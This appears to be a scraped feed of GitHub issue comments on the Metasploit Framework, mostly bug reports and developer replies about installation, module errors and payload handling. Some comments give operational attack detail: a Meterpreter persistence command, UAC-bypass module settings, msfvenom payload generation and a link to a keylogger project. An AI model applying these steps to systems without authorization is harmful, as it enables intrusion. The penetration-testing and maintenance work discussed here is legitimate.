The output in msfconsole currently looks like this

[code]

I feel it would be useful to have specific information from successful script runs included in the hosts table,

[2017-01-30 13:40] FireFart commented on #7890
@madmike33 wordpress itself is not affected by this SQL-Injection. You need to find a plugin or theme that is using the WP_Query method in this "unsafe" way so I don't think there will ever be a module exploiting this vulnerability.

[2017-01-30 14:02] madmike33 commented on #7890
@FireFart thnx for clarification

[2017-01-30 14:03] #7890 closed

[2017-01-30 16:38] busterb commented on #7885
Great!

[2017-01-30 16:38] #7885 closed

[2017-01-30 18:55] ichensky commented on #7872
Here is some code, can be useful for building raw input keylogger. https://github.com/ichensky/wri_keylogger .
Yes, an application using this API for key logging is not miss any input.

[2017-01-30 19:06] busterb commented on #7875
this should be fine now

[2017-01-30 19:06] #7875 closed

[2017-01-30 21:54] OJ commented on #7886
Fixed via #7889.

[2017-01-30 21:54] #7886 closed

[2017-01-31 19:49] wwebb-r7 commented on #7872
Nice, thanks.  I have no idea when I or anyone else will get around to it, but we'll implement the API sometime in the future.

[2017-01-31 20:53] locoalien commented on #7875
Hello

Look at the following example in which "run persistence" can be used correctly. With the new update of the Metasploit Framework, the way to execute the command correctly is to keep the session in the background while executing the exploit "/exploit/windows/local/persistence".

The following example shows clearly how to use it:

`
meterpreter > sessions 1              //Session in Background

[2017-01-31 21:13] OJ commented on #7875
Let me guess, you're running Kali?

[2017-01-31 21:19] OJ commented on #7872
I'll get onto this at some point, but it's not high on the list of priorities.

[2017-01-31 21:31] locoalien commented on #7875
Yes sr

[2017-01-31 21:51] wvu-r7 commented on #7891
I think it's a great idea. Consider updating the `services` table as well, if you require.

[2017-01-31 22:00] OJ commented on #7875
You'll have to wait until Kali gets updated.

[2017-01-31 22:46] wvu-r7 commented on #7875
@locoalien: You're using the wrong `run` command if you want to do it from within Meterpreter.

[2017-01-31 22:47] wvu-r7 commented on #7875
@locoalien: You're using the wrong `run` command if you want to do it within Meterpreter.

[code]

This is the console prompt.

[2017-01-31 22:48] wvu-r7 commented on #7875
@locoalien: You're using the wrong `run` command if you want to do it within Meterpreter.

[code]

This is the console prompt. Interact with the session first.

[2017-02-01 06:06] 765uyg opened #7898 "Gem::InstallError: nokogiri requires Ruby version >= 2.1.0."
Linux 3.2.6  i686 GNU/Linux

When I upgraded with msfupdate, there were the following tips, but I don't know how to upgrade ruby,please help me

Gem::InstallError: nokogiri requires Ruby version >= 2.1.0.
An error occured while installing nokogiri (1.7.0.1), and Bundler cannot continue.

[2017-02-01 06:23] 765uyg commented on #7898
Some people say
sudo apt-get install ruby2.1.1

but it's not work
Couldn't find package ruby2.1.1

where I can download package

[2017-02-01 06:26] wvu-r7 commented on #7898
Use RVM (https://rvm.io/) or rbenv (https://github.com/rbenv/rbenv). 2.3.3 is the currently supported version.

[2017-02-01 06:26] #7898 closed

[2017-02-01 12:45] locoalien commented on #7875
Hello @wvu-r7
As I have done it works correctly. For the latest version of Metasploit you have a problem entering the command `run persistence -U -i 5 -p 80 -r IP_LOCAL`. Then opt for the alternative posed in the previous post for people who present the problem by entering the command you mention.

[2017-02-01 18:28] wvu-r7 commented on #7875
You're on Kali. It's not the latest version until the next update ships.

[code]

This is what you should see if you're on `master`.

[2017-02-01 18:30] wvu-r7 commented on #7875
@locoalien: Wait, are you providing advice or seeking it? It sounds like you're providing advice. If that's the case, your followup suggestion is correct. You can safely disregard what I'm saying. Thanks!

[2017-02-01 21:06] carnal0wnage opened #7899 "Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank error if you dont set a password"
## Steps to reproduce

ssh_login

set USERPASS_FILE but dont set a password

[code]
if you set a PASSWORD it will sort of work unless of course the module doesnt take a password like ssh_login_pubkey
[code]
[code]
git pull today

[2017-02-01 21:08] mubix commented on #7899
Confirmed / reproduced

[2017-02-01 21:52] busterb commented on #7899
Would you folks be willing to check out the fix above?

[2017-02-01 23:15] mubix commented on #7899
Fixed, however when no options are set except the RHOST/RPORT this isn't an informative error to the user:
[code]

[2017-02-02 04:25] busterb commented on #7899
Seems like the module should be able to better read the tea-leaves coming from the loginscanner class.

[2017-02-02 06:58] alimp5 opened #7901 "msfrpc_irb.rb ruby gem; warning messages AND unexpected results"
Hi,

When I run msfrc_irb.rb script, I will get warning messages.
Whats the problem?? and How I can fix the issue(s) !?

root@kali: gem install msfrpc-client
Successfully installed msfrpc-client-1.0.3

root@kali: ruby --version
ruby 2.3.3p222 (2016-11-21) [x86_64-linux-gnu]

root@kali:~# msfconsole --version
Framework Version: 4.13.15-dev

root@kali: ./irb_msfrpc.rb --rpc-host 127.0.0.1 --rpc-port

[2017-02-02 15:12] alimp5 commented on #7901
It's very interesting.
some plugins and scripts are working as a YoYo toy.   :)
one of  them is RPC tool.  :(

?>
**?> rpc.call('session.meterpreter_run_single', '1', 'sysinfo')**
Msf::RPC::ServerException: Msf::RPC::Exception Invalid Authentication Token ["lib/msf/core/rpc/v10/service.rb:148:in `process'", "lib/msf/core/rpc/v10/service.rb:90:in `on_request_uri'", "lib/msf/core/rpc/v10/service.rb:

[2017-02-02 15:42] busterb commented on #7901
Hi, 'msfrc_irb.rb' is not a part of this project at all. What makes you think this is a metasploit-framework issue?

[2017-02-02 16:29] alimp5 commented on #7901
Hi,
because I saw and read many related topics to RPC, IRB, MSFRPC and.... issues for interacting with Metasploit framework.

I saw a week ago a topic about msfrpc-irb gem issue and other contributers helped him and issue fixed in new version (1.3.0).

If you think is not related to metasploit issues, please give me correct links to solve these issues.
not like as stackoverflow............ . anyon

[2017-02-02 17:20] busterb commented on #7901
Oh, I see. That's an entirely different project. Seems it's been overlooked by everyone for 3 years: https://github.com/rapid7/msfrpc-client

[2017-02-02 23:41] guarisma opened #7903 "Can't import XML report from OpenVAS"
## Steps to reproduce

How'd you do it?

1. I run msf > db_import ./metasploitable3/report-b1ebe60c-577e-4cdb-8ead-4d09e6474835.xml
[report-b1ebe60c-577e-4cdb-8ead-4d09e6474835.xml.txt](https://github.com/rapid7/metasploit-framework/files/749220/report-b1ebe60c-577e-4cdb-8ead-4d09e6474835.xml.txt)

## Expected behavior

What should happen?
No errors, and vulns table populated with vulnerabilities

[2017-02-03 10:46] busterb commented on #7901
Going to close this in favor of the issue on the msfrpc-client project.

[2017-02-03 10:46] #7901 closed

[2017-02-03 11:14] kkar commented on #7885
what is great? i showed you that there isn't such an option in there :)

[2017-02-03 11:34] busterb commented on #7885
I can see is 'It works!' and lot of random pastes from msfconsole. Help us by being clear about what you're saying. Also, please surround pastes from msfconsole with

[code]

[2017-02-03 11:41] kkar commented on #7885
It's the output of "show options" and "show advanced", it's not random at all

[2017-02-03 13:38] vysec commented on #7885
If all else fails just proxychains it?! o.O

[2017-02-03 14:15] kkar commented on #7885
I cannot replicate a realistic pentest scenario just by using proxychains, especially when the client is a company where all workstations are windows based. :P

[2017-02-03 16:45] vysec commented on #7885
Could always use proxycap jk

[2017-02-03 17:05] busterb commented on #7885
OK, I missed the sarcasm from the **It Works**.

This might just be a missing mixin in the stageless version of the payload that we need to add. The code is definitely inside of Meterpreter itself for this. Does setting PayloadProxyHost, etc. anyway still have the intended effect?

[2017-02-04 00:42] kkar commented on #7885
@busterb what are the settings again, since i can't see them listed? PayloadProxyHost and PayloadProxyPort? Thanks again!

[2017-02-04 00:43] Wack0 opened #7907 "reverse_hop_http broken"
## Steps to reproduce

The `reverse_hop_http` payload is broken. It relies on the RECV POST functionality which was removed back in [December of 2015](https://github.com/rapid7/metasploit-payloads/commit/1061df8b8d286329cf929a3ce8eec795135ca66b).

Instead of creating a session, it just constantly waits, with HTTP requests being made from both systems.

I'm attempting a fix, but my fix is so hacky

[2017-02-04 16:01] nektarioscottros opened #7911 "Fuck your shit"
## Steps to reproduce

How'd you do it?

1. ...0day
2. ...0day

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`

[2017-02-04 16:19] #7911 closed

[2017-02-04 22:03] sn0wfa11 opened #7912 "Console Route Print Fails When Table Includes Both IPv4 and IPv6 Routes"
## Steps to reproduce
1. Start a Meterpreter session on a machine that has both IPv4 and IPv6 routes available.
2. Add an IPv4 route for that session in the main console.
3. Add an IPv6 route for that session in the main console.
4. Type `route`, hit enter.

(Output below.)

## Expected behavior
Should print both IPv4 and IPv6 Routes.

## Current behavior
Throws an error when the table includes bo

[2017-02-05 09:45] OJ commented on #7907
Yup, this doesn't surprise me at all. We pushed on ahead with the other changes knowing that this was probably going to break. Might be easier to get @scriptjunkie involved here as he was the original author of that.

[2017-02-05 17:47] scriptjunkie commented on #7907
Man @OJ, stop breaking muh stuff. In all seriousness, is there a way I can add a reverse hop test to the standard tests so when somebody fries it in the future the build will fail?
@Wack0, would you mind sharing your fix attempt so far? Even if not great I'm sure it will speed up getting a real fix in.

[2017-02-05 23:28] OJ commented on #7907
Pretty sure that I knew it was breaking, but due to $PRIORITIES we just pushed on.

I'm assuming the fix will be pretty easy given that the core requirement is about supporting a `GET` instead of a `POST` for the initial requests.

[2017-02-06 09:15] klaszlo8207 opened #7919 "Permission denied exec: msfvenom"
I am on Windows 10, yesterday I installed the framework, than I run the Metasploit Pro Console

"successfully loaded plugin: pro"

after I do this command:

msfvenom

I got this:

Permission denied exec: msfvenom

What is the probleme? Have to run something else before I go with metasploit console?

Thanks

[2017-02-06 11:55] FireFart opened #7921 "HttpTrace not working correctly with Chunked encoding"
I just noticed this when testing a module against a Virtual Box VM.

If the Response from a HTTP request contains a `Transfer-Encoding: chunked` the output is completely messed up.

It looks smth. like this:
[code]

The problem lies in the `Packet::to_s` method.

If the `Transfer-Encoding` is `chunked` the `chunk` method is called:
https://github.com/rapid7/metasploit-framework/blob/cab19dc63c4fe6

[2017-02-06 11:57] FireFart commented on #7921
PS: HTTP `Request` and `Response` both inherit `Packet` but I think the chunked stuff only makes sense on a `Request` object, not on a `Response`.

[2017-02-06 14:58] busterb commented on #7919
'msfvenom' is not a command exposed at all in Metasploit Pro. CC: @cdoughty-r7

If you want a Windows package that includes msfvenom, please use the open-source installer instead:
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers#windows

Also, note that 'msfvenom' is not a command for the console at all. It is a standalone program. If you want to generate a payload from msfco

[2017-02-06 14:58] #7919 closed

[2017-02-06 22:25] FireFart opened #7923 "msftidy errors on master"
Currently we have some errors and infos on the master branch when running `msftidy`

[code]

Looks like there are also false positives so msftidy might need some tweaking

[2017-02-06 23:55] wvu-r7 commented on #7923
*"Now I am become regex, the destroyer of parsers."* - `msftidy`

[2017-02-06 23:56] wvu-r7 commented on #7921
Hmm, I saw this very recently.

[2017-02-07 01:59] h00die commented on #7923
the service_persistence ones I wrote, and its a false positive. See https://github.com/rapid7/metasploit-framework/pull/7012#issuecomment-227916946

[2017-02-07 02:04] h00die opened #7924 "Docs for nfsmount & snmp_login"
About 1/3 of the way down the page theres some example output for http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/ which can be used to easily gen some docs for `auxiliary/scanner/nfs/nfsmount`

[2017-02-07 02:06] h00die commented on #7924
Also for snmp_login!

[2017-02-07 05:59] Nobody83 commented on #7923
wvu Oppenheimer.  Best quote ever.

On Feb 6, 2017 7:56 PM, "wvu-r7" <notifications@github.com> wrote:

[2017-02-07 06:50] wvu-r7 commented on #7923
In case the joke was lost, `msftidy` is a complicated mess of regex trying to "parse" Ruby.

[2017-02-07 08:55] funoverip opened #7925 "during msfvenom, "running msfupdate" suggestion should be send to stderr and not stdout"
The following message is printed to stdout instead of stderr, _**silently**_ breaking out the raw version of the shellcode, when the output of msfvenom is piped to additional commands , or redirected to a file.

## Steps to reproduce

`root@linux:~# msfvenom -p <payload> -f raw <options> | my_selfmade_encoder.sh `

or

`root@linux:~# msfvenom -p <payload> -f raw <options>  > /tmp/payload.raw
`
The

[2017-02-07 08:57] wvu-r7 commented on #7925
Oh, yuck.

[2017-02-07 09:49] Anonymousismyname opened #7926 "bypassuac_injection returns {Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System}"
when i use bypassuac_injection i get an error "Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System"
i also changed the target,migrated between x86 and x64 process.but i still get this error

and i use "run"after setting all of the parameters instead of "exploit" since that doesnt even work when.
what im i doing wrong?

[2017-02-07 10:01] OJ commented on #7926
For this to work you need to make sure that all of the following match:

* System architecture (ie. the arch of the system you're running on).
* Meterpreter architecture (ie. the current meterpreter session you'll run the exploit through).
* Payload architecture (ie. the `PAYLOAD` setting in the exploit module).
* Target architecture (ie. the `TARGET` setting in the exploit module).

If they all m

[2017-02-07 10:05] wvu-r7 commented on #7925
My gut instinct was to check our Omnibus package. Looks like a problem with `msfwrapper.erb`. cc @bcook-r7

[2017-02-07 10:39] busterb commented on #7925
well sure, that's the point. However we fix this, you will still have to 'Consider running 'msfupdate' to update to the latest version."'